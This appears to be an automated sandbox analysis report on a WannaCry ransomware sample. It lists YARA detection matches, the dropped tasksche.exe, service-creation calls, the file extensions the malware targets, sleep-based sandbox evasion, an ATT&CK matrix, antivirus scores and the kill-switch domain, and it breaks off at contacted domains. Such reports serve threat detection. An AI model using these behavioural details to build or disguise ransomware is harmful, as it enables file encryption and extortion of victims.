Source: 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 00000001.00000000.249931141.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: 00000000.00000000.247147186.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED | Matched rule: Detects WannaCry Ransomware, Author: Florian Roth (with the help of binar.ly)
Source: C:\Windows\tasksche.exe, type: DROPPED | Matched rule: detects wannacry ransomware on disk and in virtual page, Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED | Matched rule: Win32_Ransomware_WannaCry, Author: ReversingLabs
Source: MSNRf9dZ63.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: MSNRf9dZ63.exe, type: SAMPLE | Matched rule: WannaCry_Ransomware, date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: MSNRf9dZ63.exe, type: SAMPLE | Matched rule: wanna_cry_ransomware_generic, date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: MSNRf9dZ63.exe, type: SAMPLE | Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware, date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic, date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000001.00000000.249931141.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: 00000000.00000000.247147186.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile created: C:\WINDOWS\tasksche.exeJump to behavior
          Source: C:\Windows\tasksche.exe Code function: 2_2_00406C40
          Source: C:\Windows\tasksche.exe Code function: 2_2_00402A76
          Source: C:\Windows\tasksche.exe Code function: 2_2_00402E7E
          Source: C:\Windows\tasksche.exe Code function: 2_2_0040350F
          Source: C:\Windows\tasksche.exe Code function: 2_2_00404C19
          Source: C:\Windows\tasksche.exe Code function: 2_2_0040541F
          Source: C:\Windows\tasksche.exe Code function: 2_2_00403797
          Source: C:\Windows\tasksche.exe Code function: 2_2_004043B7
          Source: C:\Windows\tasksche.exe Code function: 2_2_004031BC
          Source: MSNRf9dZ63.exeStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
          Source: tasksche.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: MSNRf9dZ63.exeReversingLabs: Detection: 96%
          Source: MSNRf9dZ63.exeVirustotal: Detection: 83%
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile read: C:\Users\user\Desktop\MSNRf9dZ63.exeJump to behavior
          Source: MSNRf9dZ63.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\MSNRf9dZ63.exe C:\Users\user\Desktop\MSNRf9dZ63.exe
          Source: unknownProcess created: C:\Users\user\Desktop\MSNRf9dZ63.exe C:\Users\user\Desktop\MSNRf9dZ63.exe -m security
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: classification engineClassification label: mal100.rans.evad.winEXE@4/1@2/1
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,1_2_00407C40
          Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,2_2_00401CE8
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeCode function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeCode function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,1_2_00408090
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeCode function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,0_2_00407CE0
          Source: tasksche.exe, 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, MSNRf9dZ63.exe, tasksche.exe.0.drBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: MSNRf9dZ63.exeStatic file information: File size 6729728 > 1048576
          Source: MSNRf9dZ63.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x305000
          Source: MSNRf9dZ63.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
          Source: C:\Windows\tasksche.exeCode function: 2_2_00407710 push eax; ret 2_2_0040773E
          Source: C:\Windows\tasksche.exeCode function: 2_2_004076C8 push eax; ret 2_2_004076E6
          Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45

          Persistence and Installation Behavior

          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile created: C:\Windows\tasksche.exeJump to dropped file
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeFile created: C:\Windows\tasksche.exeJump to dropped file
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeCode function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exe TID: 5488Thread sleep time: -86400000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeThread delayed: delay time: 86400000Jump to behavior
          Source: C:\Users\user\Desktop\MSNRf9dZ63.exeThread delayed: delay time: 86400000Jump to behavior
          Source: MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmp, MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
          Source: C:\Windows\tasksche.exeCode function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00401A45
          Source: C:\Windows\tasksche.exeCode function: 2_2_004029CC free,GetProcessHeap,HeapFree,2_2_004029CC
          MITRE ATT&CK matrix (the number before a technique name is the count shown in the report for that technique):

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 2 Service Execution | 4 Windows Service | 4 Windows Service | 12 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact
          Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Process Injection | 21 Virtualization/Sandbox Evasion | LSASS Memory | 21 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Remote System Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Obfuscated Files or Information | NTDS | 1 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial sample:
          Source | Detection | Scanner | Label
          MSNRf9dZ63.exe | 96% | ReversingLabs | Win32.Ransomware.WannaCry
          MSNRf9dZ63.exe | 83% | Virustotal |
          MSNRf9dZ63.exe | 100% | Avira | TR/AD.WannaCry.sewvt
          MSNRf9dZ63.exe | 100% | Joe Sandbox ML |

          Dropped files:
          Source | Detection | Scanner | Label
          C:\Windows\tasksche.exe | 100% | Avira | TR/AD.WannaCry.sewvt
          C:\Windows\tasksche.exe | 100% | Joe Sandbox ML |
          C:\Windows\tasksche.exe | 98% | ReversingLabs | Win32.Ransomware.WannaCry
          C:\Windows\tasksche.exe | 89% | Metadefender |

          Unpacked PE files:
          Source | Detection | Scanner | Label
          2.2.tasksche.exe.400000.0.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          1.2.MSNRf9dZ63.exe.400000.0.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          1.0.MSNRf9dZ63.exe.400000.0.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          0.2.MSNRf9dZ63.exe.7100a4.1.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          0.0.MSNRf9dZ63.exe.400000.0.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          1.0.MSNRf9dZ63.exe.7100a4.1.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          1.2.MSNRf9dZ63.exe.7100a4.1.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          2.0.tasksche.exe.400000.0.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          0.2.MSNRf9dZ63.exe.400000.0.unpack | 100% | Avira | TR/AD.WannaCry.sewvt
          0.0.MSNRf9dZ63.exe.7100a4.1.unpack | 100% | Avira | TR/AD.WannaCry.sewvt

          Domains:
          Source | Detection | Scanner | Label
          www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 16% | Virustotal |

          URLs:
          Source | Detection | Scanner | Label
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 100% | URL Reputation | malware
          https://www.kryptoslogic.com | 0% | URL Reputation | safe
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | 100% | URL Reputation | malware
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer | 100% | URL Reputation | malware
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | 0% | URL Reputation | safe
          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0 | 0% | Avira URL Cloud | safe
          Domains and IPs

          Contacted domains:
